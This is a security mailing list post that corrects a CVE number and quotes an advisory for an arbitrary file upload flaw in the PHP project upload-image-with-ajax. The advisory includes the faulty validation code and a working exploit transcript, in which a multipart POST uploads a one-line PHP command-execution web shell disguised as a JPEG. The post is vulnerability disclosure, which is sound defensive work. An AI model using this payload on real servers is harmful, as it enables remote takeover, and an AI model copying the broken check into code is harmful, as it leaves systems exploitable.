oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Arbitrary file upload vulnerability in upload-image-with-ajax v1.0

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 23 Dec 2019 16:52:05 -0500
Hello,

An update and a correction.

The CVE number should be CVE-2019-8293.  The software author also has fixed the vulnerability:

https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c

Thanks,
Larry

On 12/23/19, 12:09 PM, "Larry W. Cashdollar" <larry0 () me com> wrote:

    Title: Arbitrary file upload vulnerability in upload-image-with-ajax
    Author: Larry W. Cashdollar
    Date: 2019-12-16
    CVE-ID:[CVE-2019-8292]
    Download Site: https://github.com/abcprintf/upload-image-with-ajax/
    Vendor: adcprintf
    Vendor Notified: 2019-12-16
    Vendor Contact: wh.cprintf () gmail com
    Advisory: http://www.vapidlabs.com/advisory.php?v=211
    Description: upload-image-with-ajax
    Vulnerability:
    The code below changes the $ready flag to true if the file conforms to the size of < 1000000. Reversing the check 
that the file is an image. So, a .php file can be uploaded with only a warning allowing code execution.
    
    $ready = false;
    if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt, 
$validext)){
    $ready = true;
    }else{
    echo "was not an image
    ";
    /You should abort the upload right here/
    }
    if($_FILES["fileUpload"]["size"] < 1000000){
    $ready = true;
    echo "file size is ".$_FILES['fileUpload']["size"]."
    ";
    }else{
    echo "file was TOO BIG!";
    }
    
    Exploit Code:
     $ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php
    POST request size is 469 bytes
     
    Sending Payload:
    POST //upload-image-with-ajax/upload.php HTTP/1.1
    Host: 192.168.0.3
    User-Agent: File Upload Exploiter/v1.2
    Accept: */*
    Content-Length: 237
    Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853
     
    --------------------------c8e05c8871143853
    Content-Disposition: form-data; name="fileUpload"; filename="shell.jpg"
    Content-Type: image/jpeg
     
    <?php $cmd=$_GET['cmd']; system($cmd);?>
     
    --------------------------c8e05c8871143853--
     
    HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2019 04:39:56 GMT
    Server: Apache/2.4.25 (Debian)
    Content-Length: 37
    Content-Type: text/html; charset=UTF-8
     
    file size is 42<br>upload successful!
    [+] Total bytes read: 185
Previous By Date Next
Previous By Thread Next

Current thread: